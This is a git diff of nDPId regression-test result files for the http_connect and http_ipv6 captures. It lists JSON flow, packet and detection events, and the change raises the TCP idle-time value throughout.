+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":57373,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1631454722977} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 diff --git a/test/results/http_ipv6.pcap.out b/test/results/http_ipv6.pcap.out index d63dd103b..9fdc02f43 100644 --- a/test/results/http_ipv6.pcap.out +++ b/test/results/http_ipv6.pcap.out 
@@ -1,100 +1,100 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_ipv6.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1448269123954} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} -00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269123954,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269123954,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1448269123954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123954,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIBAAAAAAAACAOnk4Bu0sl6VcU0QFTgBAA8iVzAAABAQgKEg1o4A\/E+0k="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} +00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\/DtzNZRMDI1AdhpfiGrZQ0z8Xo88wCgAQAEQ0hMTxcAAABQQUQAlQEAAFNOSQCiAQAAU1RLANwBAABWRVIA4AEAAENDUwDoAQAATk9OQwgCAABNU1BDDAIAAEFFQUQQAgAAVUFJRDACAABTQ0lEQAIAAFRDSUREAgAAUERNREgCAABTUkJGTAIAAElDU0xQAgAAUFVCU3ACAABTQ0xTdAIAAEtFWFN4AgAAQ09QVHgCAABDQ1JUkAIAAElSVFSUAgAAQ0VUVjgDAABDRkNXPAMAAFNGQ1dAAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5pdP6VATCysYcS+6UyHFs91qYSgNdeDzmk0IEyIe5t2+bJKAI2qamMt0i7KMYplR0K0jnCGwmAm\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\/yG69qYF+ZOXnLeZQlagMSAtKsuormBERnE1N5BArSjLGqyjEsI7xMsjf+GWiD9zqRxEMc6cBgFvzaEvMvxi2SGPZg7npVciNOVP9ZU7k0lklFQEmkIVXhAz857PhdAM9F8uaoJzSnjSvvppgNKNbAOmmtmPDeC+pIAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0
p26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"} 